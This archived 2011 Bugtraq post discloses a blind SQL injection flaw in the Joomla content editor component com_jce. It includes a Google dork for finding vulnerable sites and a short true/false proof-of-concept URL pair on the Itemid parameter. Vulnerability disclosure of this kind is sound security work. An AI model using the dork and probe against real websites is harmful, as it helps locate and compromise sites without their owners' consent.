lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <20110408162859.26939.qmail@securityfocus.com>
Date: 8 Apr 2011 16:28:59 -0000
From: eidelweiss@...dowslive.com
To: bugtraq@...urityfocus.com
Subject: joomlacontenteditor (com_jce) BLIND sql injection vulnerability

===================================================================
  joomlacontenteditor (com_jce) BLIND sql injection vulnerability
===================================================================
  
Software:   joomlacontenteditor (com_jce)
Vendor:     www.joomlacontenteditor.net
Vuln Type:  BLind SQL Injection
Download link:  http://www.joomlacontenteditor.net/downloads/editor/joomla15x/category/joomla-15-2 (check here)
Author:     eidelweiss
contact:    eidelweiss[at]windowslive[dot]com
Home:       www.eidelweiss.info
Dork:       inurl:"/index.php?option=com_jce"
  
  
References: http://eidelweiss-advisories.blogspot.com/2011/04/joomlacontenteditor-comjce-blind-sql.html
  
  
===================================================================

Description:

JCE makes creating and editing Joomla!® 
content easy Add a set of tools to your Joomla!® environment that give you the power to create the kind of content you want,
without limitations, and without needing to know or learn HTML, XHTML, CSS... 

===================================================================

    exploit & p0c
  
[!] index.php?option=com_jce&Itemid=[valid Itemid]
  
    Example p0c
  
[!] http://host/index.php?option=com_jce&Itemid=8    <= True
[!] http://host/index.php?option=com_jce&Itemid=-8   <= False
  
  
====================================================================
  
    Nothing Impossible In This World Even Nobody`s Perfect
  
===================================================================

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ